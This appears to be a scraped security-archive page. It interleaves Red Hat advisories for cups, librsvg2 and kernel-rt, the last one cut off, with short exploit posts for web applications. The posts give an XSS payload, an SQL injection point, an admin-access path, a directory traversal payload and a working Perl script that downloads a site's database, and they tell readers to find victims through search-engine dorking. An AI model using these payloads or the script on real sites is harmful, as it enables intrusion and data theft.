Red Hat Security Advisory 2023-4838-01 - The Common UNIX Printing System provides a portable printing layer for Linux, UNIX, and similar operating systems. Issues addressed include an information leakage vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: cups security update  
Advisory ID:       RHSA-2023:4838-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4838  
Issue date:        2023-08-29  
CVE Names:         CVE-2023-32360   
=====================================================================

1. Summary:

An update for cups is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

The Common UNIX Printing System (CUPS) provides a portable printing layer  
for Linux, UNIX, and similar operating systems.

Security Fix(es):

* cups: Information leak through Cups-Get-Document operation  
(CVE-2023-32360)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, the cupsd service will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2230495 - CVE-2023-32360 cups: Information leak through Cups-Get-Document operation

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

aarch64:  
cups-2.3.3op2-16.el9_2.1.aarch64.rpm  
cups-client-2.3.3op2-16.el9_2.1.aarch64.rpm  
cups-client-debuginfo-2.3.3op2-16.el9_2.1.aarch64.rpm  
cups-debuginfo-2.3.3op2-16.el9_2.1.aarch64.rpm  
cups-debugsource-2.3.3op2-16.el9_2.1.aarch64.rpm  
cups-devel-2.3.3op2-16.el9_2.1.aarch64.rpm  
cups-ipptool-2.3.3op2-16.el9_2.1.aarch64.rpm  
cups-ipptool-debuginfo-2.3.3op2-16.el9_2.1.aarch64.rpm  
cups-libs-debuginfo-2.3.3op2-16.el9_2.1.aarch64.rpm  
cups-lpd-2.3.3op2-16.el9_2.1.aarch64.rpm  
cups-lpd-debuginfo-2.3.3op2-16.el9_2.1.aarch64.rpm  
cups-printerapp-2.3.3op2-16.el9_2.1.aarch64.rpm  
cups-printerapp-debuginfo-2.3.3op2-16.el9_2.1.aarch64.rpm

noarch:  
cups-filesystem-2.3.3op2-16.el9_2.1.noarch.rpm

ppc64le:  
cups-2.3.3op2-16.el9_2.1.ppc64le.rpm  
cups-client-2.3.3op2-16.el9_2.1.ppc64le.rpm  
cups-client-debuginfo-2.3.3op2-16.el9_2.1.ppc64le.rpm  
cups-debuginfo-2.3.3op2-16.el9_2.1.ppc64le.rpm  
cups-debugsource-2.3.3op2-16.el9_2.1.ppc64le.rpm  
cups-devel-2.3.3op2-16.el9_2.1.ppc64le.rpm  
cups-ipptool-2.3.3op2-16.el9_2.1.ppc64le.rpm  
cups-ipptool-debuginfo-2.3.3op2-16.el9_2.1.ppc64le.rpm  
cups-libs-debuginfo-2.3.3op2-16.el9_2.1.ppc64le.rpm  
cups-lpd-2.3.3op2-16.el9_2.1.ppc64le.rpm  
cups-lpd-debuginfo-2.3.3op2-16.el9_2.1.ppc64le.rpm  
cups-printerapp-2.3.3op2-16.el9_2.1.ppc64le.rpm  
cups-printerapp-debuginfo-2.3.3op2-16.el9_2.1.ppc64le.rpm

s390x:  
cups-2.3.3op2-16.el9_2.1.s390x.rpm  
cups-client-2.3.3op2-16.el9_2.1.s390x.rpm  
cups-client-debuginfo-2.3.3op2-16.el9_2.1.s390x.rpm  
cups-debuginfo-2.3.3op2-16.el9_2.1.s390x.rpm  
cups-debugsource-2.3.3op2-16.el9_2.1.s390x.rpm  
cups-devel-2.3.3op2-16.el9_2.1.s390x.rpm  
cups-ipptool-2.3.3op2-16.el9_2.1.s390x.rpm  
cups-ipptool-debuginfo-2.3.3op2-16.el9_2.1.s390x.rpm  
cups-libs-debuginfo-2.3.3op2-16.el9_2.1.s390x.rpm  
cups-lpd-2.3.3op2-16.el9_2.1.s390x.rpm  
cups-lpd-debuginfo-2.3.3op2-16.el9_2.1.s390x.rpm  
cups-printerapp-2.3.3op2-16.el9_2.1.s390x.rpm  
cups-printerapp-debuginfo-2.3.3op2-16.el9_2.1.s390x.rpm

x86_64:  
cups-2.3.3op2-16.el9_2.1.x86_64.rpm  
cups-client-2.3.3op2-16.el9_2.1.x86_64.rpm  
cups-client-debuginfo-2.3.3op2-16.el9_2.1.i686.rpm  
cups-client-debuginfo-2.3.3op2-16.el9_2.1.x86_64.rpm  
cups-debuginfo-2.3.3op2-16.el9_2.1.i686.rpm  
cups-debuginfo-2.3.3op2-16.el9_2.1.x86_64.rpm  
cups-debugsource-2.3.3op2-16.el9_2.1.i686.rpm  
cups-debugsource-2.3.3op2-16.el9_2.1.x86_64.rpm  
cups-devel-2.3.3op2-16.el9_2.1.i686.rpm  
cups-devel-2.3.3op2-16.el9_2.1.x86_64.rpm  
cups-ipptool-2.3.3op2-16.el9_2.1.x86_64.rpm  
cups-ipptool-debuginfo-2.3.3op2-16.el9_2.1.i686.rpm  
cups-ipptool-debuginfo-2.3.3op2-16.el9_2.1.x86_64.rpm  
cups-libs-debuginfo-2.3.3op2-16.el9_2.1.i686.rpm  
cups-libs-debuginfo-2.3.3op2-16.el9_2.1.x86_64.rpm  
cups-lpd-2.3.3op2-16.el9_2.1.x86_64.rpm  
cups-lpd-debuginfo-2.3.3op2-16.el9_2.1.i686.rpm  
cups-lpd-debuginfo-2.3.3op2-16.el9_2.1.x86_64.rpm  
cups-printerapp-2.3.3op2-16.el9_2.1.x86_64.rpm  
cups-printerapp-debuginfo-2.3.3op2-16.el9_2.1.i686.rpm  
cups-printerapp-debuginfo-2.3.3op2-16.el9_2.1.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
cups-2.3.3op2-16.el9_2.1.src.rpm

aarch64:  
cups-client-debuginfo-2.3.3op2-16.el9_2.1.aarch64.rpm  
cups-debuginfo-2.3.3op2-16.el9_2.1.aarch64.rpm  
cups-debugsource-2.3.3op2-16.el9_2.1.aarch64.rpm  
cups-ipptool-debuginfo-2.3.3op2-16.el9_2.1.aarch64.rpm  
cups-libs-2.3.3op2-16.el9_2.1.aarch64.rpm  
cups-libs-debuginfo-2.3.3op2-16.el9_2.1.aarch64.rpm  
cups-lpd-debuginfo-2.3.3op2-16.el9_2.1.aarch64.rpm  
cups-printerapp-debuginfo-2.3.3op2-16.el9_2.1.aarch64.rpm

ppc64le:  
cups-client-debuginfo-2.3.3op2-16.el9_2.1.ppc64le.rpm  
cups-debuginfo-2.3.3op2-16.el9_2.1.ppc64le.rpm  
cups-debugsource-2.3.3op2-16.el9_2.1.ppc64le.rpm  
cups-ipptool-debuginfo-2.3.3op2-16.el9_2.1.ppc64le.rpm  
cups-libs-2.3.3op2-16.el9_2.1.ppc64le.rpm  
cups-libs-debuginfo-2.3.3op2-16.el9_2.1.ppc64le.rpm  
cups-lpd-debuginfo-2.3.3op2-16.el9_2.1.ppc64le.rpm  
cups-printerapp-debuginfo-2.3.3op2-16.el9_2.1.ppc64le.rpm

s390x:  
cups-client-debuginfo-2.3.3op2-16.el9_2.1.s390x.rpm  
cups-debuginfo-2.3.3op2-16.el9_2.1.s390x.rpm  
cups-debugsource-2.3.3op2-16.el9_2.1.s390x.rpm  
cups-ipptool-debuginfo-2.3.3op2-16.el9_2.1.s390x.rpm  
cups-libs-2.3.3op2-16.el9_2.1.s390x.rpm  
cups-libs-debuginfo-2.3.3op2-16.el9_2.1.s390x.rpm  
cups-lpd-debuginfo-2.3.3op2-16.el9_2.1.s390x.rpm  
cups-printerapp-debuginfo-2.3.3op2-16.el9_2.1.s390x.rpm

x86_64:  
cups-client-debuginfo-2.3.3op2-16.el9_2.1.i686.rpm  
cups-client-debuginfo-2.3.3op2-16.el9_2.1.x86_64.rpm  
cups-debuginfo-2.3.3op2-16.el9_2.1.i686.rpm  
cups-debuginfo-2.3.3op2-16.el9_2.1.x86_64.rpm  
cups-debugsource-2.3.3op2-16.el9_2.1.i686.rpm  
cups-debugsource-2.3.3op2-16.el9_2.1.x86_64.rpm  
cups-ipptool-debuginfo-2.3.3op2-16.el9_2.1.i686.rpm  
cups-ipptool-debuginfo-2.3.3op2-16.el9_2.1.x86_64.rpm  
cups-libs-2.3.3op2-16.el9_2.1.i686.rpm  
cups-libs-2.3.3op2-16.el9_2.1.x86_64.rpm  
cups-libs-debuginfo-2.3.3op2-16.el9_2.1.i686.rpm  
cups-libs-debuginfo-2.3.3op2-16.el9_2.1.x86_64.rpm  
cups-lpd-debuginfo-2.3.3op2-16.el9_2.1.i686.rpm  
cups-lpd-debuginfo-2.3.3op2-16.el9_2.1.x86_64.rpm  
cups-printerapp-debuginfo-2.3.3op2-16.el9_2.1.i686.rpm  
cups-printerapp-debuginfo-2.3.3op2-16.el9_2.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32360  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk7gXxAAoJENzjgjWX9erEwvAP/3JfxHX3I/fgKmbWmJlnDrP/  
m5pFGTBAGR4CDbdnKNcz+hBfM3qk0ddeS2ghmmDlkFQcuZXUklLrmI6pTSJLjjhd  
4XiQ991QquAz7fqHPTcLgshTOH/uexSRI0Me7TnGjdoxt/Oz+XGTq5ZR9B5vmK/l  
NCWloH4u6fDqre1WYWjD/ymuYrMBJyCelYvbYPGSRyPI/V31cSsnkyMfC5f6JeYE  
x4oFSdGnFQmABzrjDsKLAd5AjQWp57I95zIbKX1m5XQqgCN6zYDTM6p1aDzkwXVw  
JXKvDhBUGFIyzSyR8odCxfI79GPW2zXoEesqFcL7qns87cII9wWRNWNdw7RSbhCC  
oELNJs7ChEtD+bByCkgDH5sxs3s/gAfz/ToTL+FTJDOgHG5yBzrPDSpPnyPMXg5v  
fAFP3rLhO9ec3prL4jg1Ob3lErkhPycaLWff+rDLQJq3Z1p/krEpNuLPgafBKFO0  
Hl7mJG8SRmmcZrwTN0nBtwJLkTo0BNpw39Y32gJYPqWJhW/q2SJWPrVtTYjZl/zz  
YnZ5KjMoaSy4gDysLZkus9kwU9N/0qnvhZ3PYASrE2QPv9s1SAMcQ4u/TwL4mziY  
YhbwJ/HFz4ohYntvKJu2/Lhgwfk2SxwiFnIHDJGJgioko9W2bwzKUKt8hpfL9VAu  
nn0JFxMl182anO4YZQig  
=QX7X  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4838-01

Red Hat Security Advisory 2023-4809-01 - The librsvg2 packages provide a Scalable Vector Graphics library based on the libart library.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: librsvg2 security update  
Advisory ID:       RHSA-2023:4809-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4809  
Issue date:        2023-08-29  
CVE Names:         CVE-2023-38633   
=====================================================================

1. Summary:

An update for librsvg2 is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

The librsvg2 packages provide a Scalable Vector Graphics (SVG) library  
based on the libart library.

Security Fix(es):

* librsvg: Arbitrary file read when xinclude href has special characters  
(CVE-2023-38633)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2224945 - CVE-2023-38633 librsvg: Arbitrary file read when xinclude href has special characters

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
librsvg2-2.50.7-1.el9_0.1.src.rpm

aarch64:  
librsvg2-2.50.7-1.el9_0.1.aarch64.rpm  
librsvg2-debuginfo-2.50.7-1.el9_0.1.aarch64.rpm  
librsvg2-debugsource-2.50.7-1.el9_0.1.aarch64.rpm  
librsvg2-devel-2.50.7-1.el9_0.1.aarch64.rpm  
librsvg2-tools-2.50.7-1.el9_0.1.aarch64.rpm  
librsvg2-tools-debuginfo-2.50.7-1.el9_0.1.aarch64.rpm

ppc64le:  
librsvg2-2.50.7-1.el9_0.1.ppc64le.rpm  
librsvg2-debuginfo-2.50.7-1.el9_0.1.ppc64le.rpm  
librsvg2-debugsource-2.50.7-1.el9_0.1.ppc64le.rpm  
librsvg2-devel-2.50.7-1.el9_0.1.ppc64le.rpm  
librsvg2-tools-2.50.7-1.el9_0.1.ppc64le.rpm  
librsvg2-tools-debuginfo-2.50.7-1.el9_0.1.ppc64le.rpm

s390x:  
librsvg2-2.50.7-1.el9_0.1.s390x.rpm  
librsvg2-debuginfo-2.50.7-1.el9_0.1.s390x.rpm  
librsvg2-debugsource-2.50.7-1.el9_0.1.s390x.rpm  
librsvg2-devel-2.50.7-1.el9_0.1.s390x.rpm  
librsvg2-tools-2.50.7-1.el9_0.1.s390x.rpm  
librsvg2-tools-debuginfo-2.50.7-1.el9_0.1.s390x.rpm

x86_64:  
librsvg2-2.50.7-1.el9_0.1.i686.rpm  
librsvg2-2.50.7-1.el9_0.1.x86_64.rpm  
librsvg2-debuginfo-2.50.7-1.el9_0.1.i686.rpm  
librsvg2-debuginfo-2.50.7-1.el9_0.1.x86_64.rpm  
librsvg2-debugsource-2.50.7-1.el9_0.1.i686.rpm  
librsvg2-debugsource-2.50.7-1.el9_0.1.x86_64.rpm  
librsvg2-devel-2.50.7-1.el9_0.1.i686.rpm  
librsvg2-devel-2.50.7-1.el9_0.1.x86_64.rpm  
librsvg2-tools-2.50.7-1.el9_0.1.x86_64.rpm  
librsvg2-tools-debuginfo-2.50.7-1.el9_0.1.i686.rpm  
librsvg2-tools-debuginfo-2.50.7-1.el9_0.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-38633  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk7gXmAAoJENzjgjWX9erEsuAP/3JsqjZLcYlnCCj8LFj12VF1  
szOqxtD0x+s6/0OoSh1ry7x+ReJ4Hl3bE3XMDiNV+KQOZIbi7rgXPk/V44LA1+Su  
g+1h3xasJluKb2TdjGJL6E3bTj1M8jRV2HERzZbQ5xAROZ1Opiv9LeCyljxYUBf2  
jTH+WIpkw8n3kk0YEluQCvXl64PJNZbJKBFdWrvtaQ1r78NDF1nSe8D/b28FPx9c  
C+QHAiFmHNpiY/9Wq3fRocJwuClbKPKzFDs0V40+R54YosRSZfVGf/4N4Ndi7do2  
BnohX13NMZmX6GuyQE2dZVpCkUaHipj83m2WNOsWH4siT5OjcC02CibQ+lAcrJm2  
rps6AWTtLoO5509dHM8EHGGU1LCndJD5DZUkg6mu3hyuClcRK5nWXLrSYAQVez4y  
YGbraHyc/1TzSN6XsWXCbr0q+8u5nhu908WSLpvxyzehZkcypAu4+mEFIcfd1nIy  
k0WrQ7uZOEpcVNZUw9vh8Dc8fzm4KHlpOqE6s3C0Zzr53kX7bQ3LcCCqs9ourwbL  
oiiHXf6L7O/rqqJ4HaTwkVJtZQjCJRfBQ9g66fSYR9YbXOZiIXovR65MZKVl2kqK  
JQR51S7JIkwcSjLtVkU89PNrHmvPIGIpJInFO7E3NoO/tYxsE3vsFtUwiqQVnzb+  
JGYUfd0wZA8/0AQ4BwYc  
=CYlx  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4809-01

ImgHosting version 1.2 suffers from a cross site scripting vulnerability.

**ImgHosting 1.2 Cross Site Scripting**

Posted Aug 29, 2023

Authored by indoushka

ImgHosting version 1.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 3e0de4ff80dc516a1abe50185e5807a1e503d782b2cd24457e01031368191dc0

Download | Favorite | View

**ImgHosting 1.2 Cross Site Scripting**

    ====================================================================================================================================| # Title     : ImgHosting v1.2 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://codecanyon.net/user/FoxSash/?ref=FoxSash                                                                   |  | # Dork      : "ImgHosting  Programming by FoxSash"                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : ?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://127.0.0.1/pikhostinom/?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,046)
*   Arbitrary (16,219)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,283)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,460)
*   Encryption (2,370)
*   Exploit (52,001)
*   File Inclusion (4,225)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,788)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,694)
*   Local (14,460)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,339)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,816)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,891)
*   Shell (3,187)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,394)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,796)
*   Web (9,671)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,973)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,822)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,543)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,777)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,844)
*   UNIX (9,301)
*   UnixWare (186)
*   Windows (6,579)
*   Other

ImgHosting 1.2 Cross Site Scripting

imax CMS version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : imax CMS v1.0 Sql Injection Vulnerability                                                                          || # Author    : indoushka                                                                                                          | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://i-maxinfotech.com                                                                                           |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] http://127.0.0.1/cafesaffronnetau/view_page.php?id={{x.id}} <=====| inject here[+]  Panel :http://127.0.0.1/cafesaffronnetau/wp-admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

imax CMS 1.0 SQL Injection

i-Gallery version 3.4 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : i-Gallery v3.4 Database Disclosure Exploit                                                                         |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : http://wmscripti.com/asp-scriptler/igallery-image-resim-galerisi-scripti.html                                      |    
====================================================================================================================================

poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (igallery.mdb ) file  
    The (igallery.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
#  
# i-Gallery v3.4 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor : ToastForums.com

   use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print ('i-Gallery v3.4 Database Disclosure Exploit');  
system('color a');

if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="database/igallery.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/igallery.mdb");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/igallery.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
=======================================================================================================================================

i-Gallery 3.4 Database Disclosure

iBilling CRM version 4.5.0 suffers from add administrator and insecure direct object reference vulnerabilities.

    ====================================================================================================================================| # Title     : iBilling CRM v4.5.0 Add Admin vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/ibilling-crm-accounting-and-billing-software/11021678                                  || # Dork      : "Login - iBilling"                                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] suffers from an insecure direct object reference that allows users to access the administrative interface.[+] choose a target and add "sysfrm/install/profile.php"[+] http://127.0.0.1/wintechsolutionsin/ibilling/sysfrm/install/profile.php[+] http://127.0.0.1/demotryibcom/dashboard/sysfrm/install/profile.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

iBilling CRM 4.5.0 Add Administrator / Insecure Direct Object Reference

Humhub version 1.3.13 suffers from a directory traversal vulnerability.

    ====================================================================================================================================| # Title     : Humhub v1.3.13 Directory traversal Vulnerability                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 67.0(32-bit)                                               | | # Vendor    : https://www.humhub.org/en/download/package/humhub-1.3.13.zip                                                       |  | # Dork      : "Propulsé par HumHub"                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /static/assets/d1081741/fonts/../Gemfile[+] https://127.0.0.1/humhubcom/static/assets/d1081741/fonts/../GemfileGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Humhub 1.3.13 Directory Traversal

Red Hat Security Advisory 2023-4817-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include out of bounds access and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2023:4817-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4817  
Issue date:        2023-08-29  
CVE Names:         CVE-2023-2124 CVE-2023-3090 CVE-2023-35788   
=====================================================================

1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 8.2  
Telecommunications Update Service.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Real Time TUS (v. 8.2) - x86_64  
Red Hat Enterprise Linux Real Time for NFV TUS (v. 8.2) - x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: ipvlan: out-of-bounds write caused by unclear skb->cb  
(CVE-2023-3090)

* kernel: cls_flower: out-of-bounds write in fl_set_geneve_opt()  
(CVE-2023-35788)

* kernel: OOB access in the Linux kernel's XFS subsystem (CVE-2023-2124)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* kernel-rt: update RT source tree to the RHEL-8.2.z28 source tree  
(BZ#2228917)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2187439 - CVE-2023-2124 kernel: OOB access in the Linux kernel's XFS subsystem  
2215768 - CVE-2023-35788 kernel: cls_flower: out-of-bounds write in fl_set_geneve_opt()  
2218672 - CVE-2023-3090 kernel: ipvlan: out-of-bounds write caused by unclear skb->cb

6. Package List:

Red Hat Enterprise Linux Real Time for NFV TUS (v. 8.2):

Source:  
kernel-rt-4.18.0-193.113.1.rt13.164.el8_2.src.rpm

x86_64:  
kernel-rt-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm  
kernel-rt-core-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm  
kernel-rt-debug-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm  
kernel-rt-debug-core-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm  
kernel-rt-debug-kvm-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm  
kernel-rt-devel-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm  
kernel-rt-kvm-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm  
kernel-rt-modules-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm

Red Hat Enterprise Linux Real Time TUS (v. 8.2):

Source:  
kernel-rt-4.18.0-193.113.1.rt13.164.el8_2.src.rpm

x86_64:  
kernel-rt-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm  
kernel-rt-core-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm  
kernel-rt-debug-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm  
kernel-rt-debug-core-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm  
kernel-rt-devel-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm  
kernel-rt-modules-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-193.113.1.rt13.164.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
